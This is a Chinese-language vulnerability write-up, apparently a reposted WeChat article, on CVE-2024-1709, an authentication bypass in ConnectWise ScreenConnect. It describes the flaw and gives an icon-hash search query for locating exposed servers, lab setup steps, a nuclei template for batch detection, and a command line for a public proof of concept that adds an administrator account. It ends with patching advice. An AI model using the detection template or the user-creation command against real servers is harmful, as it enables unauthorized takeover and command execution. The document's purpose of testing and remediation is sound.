01漏洞名称
02漏洞影响
ConnectWise ScreenConnect 23.9.7及之前版本
03漏洞描述
ConnectWise ScreenConnect 23.9.7及之前版本存在身份验证绕过漏洞,攻击者可通过替代路径或通道绕过身份验证,未经授权攻击者可以利用此漏洞注册账户,登陆到产品后台,而且可以通过 ScreenConnect的原有功能执行操作系统命令,直接访问机密信息或关键系统。
详细漏洞分析请参考
https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
04FOFA搜索语句
icon_hash
=
"-82958153"
05靶场安装
上官网根据自己的操作系统下载对应的安装包
https://screenconnect.connectwise.com/download/archive
我是在centos上安装,先上传安装包,然后解压
tar
-zxvf
ScreenConnect_20
.3
.31734
.7751_Release
.tar
.gz
cd
ScreenConnect_20
.3
.31734
.7751_Install
执行安装脚本
./install.sh
访问页面
http://localhost:8040/Host
然后在官网免费申请一个使用license即可
06批量验证POC
nuclei poc文件内容如下
id
: CVE-2024-1709
info
:
name
:
ConnectWise ScreenConnect 23.9.7 - Authentication Bypass
author
:
johnk3r
severity
:
critical
description
:
|
ConnectWise
ScreenConnect 23.9.7 and prior are affected by an Authentication Bypass Using an Alternate Path or Channel vulnerability, which may allow an attacker direct access to confidential information or critical systems.
reference
:
https://www.huntress.com/blog/a-catastrophe-for-control-understanding-the-screenconnect-authentication-bypass
https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
https://nvd.nist.gov/vuln/detail/CVE-2024-1709
classification
:
:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
:
10.0
:
CVE-2024-1709
:
CWE-288
metadata
:
verified
:
true
:
1
vendor
:
connectwise
product
:
screenconnect
:
http.favicon.hash:-82958153
tags
:
cve,cve2024,screenconnect,connectwise,auth-bypass,kev
variables
:
string
:
"{{rand_text_alpha(10)}}"
http
:
method: GET
path
:
"{{BaseURL}}/SetupWizard.aspx/{{string}}"
:
and
matchers
:
type: word
part
:
body
words
:
"SetupWizardPage"
"ContentPanel SetupWizard"
condition
:
and
type: status
status
:
200
extractors
:
type: kval
part
:
header
kval
:
Server
# digest: 4a0a004730450220564c9949c406c35520203b46a2a34bba505d1cadfde47e8a38f9a073264e97f0022100ff2a065d66fa48b8502a068445d833e6700efd1e9715d034f1ea16e91696bd06:922c64590222798bb761d5b6d8e72950
运行POC
nuclei.exe -l
data
/CVE-
2024
-
1709
.txt -t mypoc/cve/CVE-
2024
-
1709
.yaml
07漏洞利用
github上有python版的代码可以添加用户
https:
//github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc
使用方法
python
watchtowr-vs-ConnectWise_2024-
02
-
21
.py --url http://localhost --username hellothere --password admin123!
创建好用户后直接登录后台,可以执行系统命令。
08修复建议
升级到23.9.8以上版本。
https://screenconnect.connectwise.com/download
原文始发于微信公众号(AI与网安):CVE-2024-1709
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论